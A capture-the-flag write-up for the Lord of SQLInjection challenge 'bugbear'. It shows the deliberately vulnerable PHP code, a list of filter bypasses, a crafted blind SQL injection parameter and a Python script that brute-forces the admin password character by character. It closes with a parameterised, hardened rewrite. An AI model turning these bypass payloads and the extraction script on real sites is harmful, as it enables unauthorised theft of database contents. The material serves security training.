LOS #13 bugbear
0xe82de_
2020. 10. 28. 22:58
Lord of SQLInjection (los.rubiya.kr)
Source code
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~");
if(preg_match('/\'/i', $_GET[pw])) exit("HeHe");
if(preg_match('/\'|substr|ascii|=|or|and| |like|0x/i', $_GET[no])) exit("HeHe");
$query = "select id from prob_bugbear where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_bugbear where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("bugbear");
highlight_file(__FILE__);
?>
Query
select id from prob_bugbear where id='guest' and pw='52dc3991' and no=
Write-up
The filtered characters and the bypass used for each are as follows.
- single quote > bypass with double quotes
- substr() > bypass with the right() and left() functions
- = > in
- or > %7C%7C
- and > %26%26
- white space > %0b
- like > in
This problem is almost the same as LOS #12 darkknight. Only the filtered characters need to be replaced with the corresponding bypasses.
As the image above shows, once the filtered characters are bypassed, the length of the pw value can be found with the length() function.
Parameter
pw=1&no=1%0b%7C%7Cleft(id,5)%0bin("admin")%0b%26%26%0blength(pw)%0bin("8")
The resulting query is as follows.
select id from prob_bugbear where id='guest' and pw='1' and no=2||left(id,5)in("admin")&&length(pw)in("8")
Code
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests

pw = ""
for i in range(1, 9):            # pw is 8 characters long (found above with length(pw) in("8"))
    for j in range(48, 128):     # candidate character code, passed to chr() to build the guess
        try:
            url = ("https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php"
                   "?pw=1&no=2%0b%7C%7C%0bleft(id,5)%0bin%0b(\"admin\")%0b%26%26%0b"
                   "right(left(pw," + str(i) + "),1)%0bin%0b(\"" + chr(j) + "\")")
            result = requests.post(url, cookies=dict(PHPSESSID="<session value>"))
        except Exception:
            print("Error...")
            continue
        if 'Hello admin' in result.text:   # true only when the i-th character of pw equals chr(j)
            pw = pw + chr(j)
            print("pw : " + pw)
            break
Success
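For comparison, here is a hardened rewrite of the handler, added as an example and not the challenge's own code. It assumes the same config.php helpers (login_chk(), dbconnect() returning a mysqli object with mysqlnd, solve()). Binding input as parameters and validating `no` as an integer makes the character blacklist, and every bypass listed in the write-up, irrelevant:

```php
<?php
// Hardened version of prob_bugbear (added example, not the original challenge code).
// Assumes config.php provides login_chk(), dbconnect() (mysqli) and solve().
include "./config.php";
login_chk();
$db = dbconnect();

// Validate the type of `no` instead of blacklisting characters: it must be an integer,
// so "2||left(id,5)in(...)" is rejected before any SQL is built.
$no = filter_input(INPUT_GET, 'no', FILTER_VALIDATE_INT);
$pw = $_GET['pw'] ?? '';
if ($no === false || $no === null) exit("no must be an integer");

// Parameterised query: pw and no are bound as data, so quotes, ||, &&, in(...)
// and vertical-tab whitespace cannot change the statement's structure.
$stmt = $db->prepare("SELECT id FROM prob_bugbear WHERE id='guest' AND pw=? AND no=?");
$stmt->bind_param("si", $pw, $no);
$stmt->execute();
$row = $stmt->get_result()->fetch_assoc();
if ($row && $row['id']) echo "<h2>Hello " . htmlspecialchars($row['id']) . "</h2>";

// Admin check: fetch the stored pw by id only and compare in PHP with a
// constant-time comparison, so no user input reaches the second query at all.
$stmt = $db->prepare("SELECT pw FROM prob_bugbear WHERE id='admin'");
$stmt->execute();
$row = $stmt->get_result()->fetch_assoc();
if ($row && hash_equals($row['pw'], $pw)) solve("bugbear");
?>
```

With this version the blind-injection loop above no longer works: the `no` value is rejected by FILTER_VALIDATE_INT and `pw` is never interpolated into SQL.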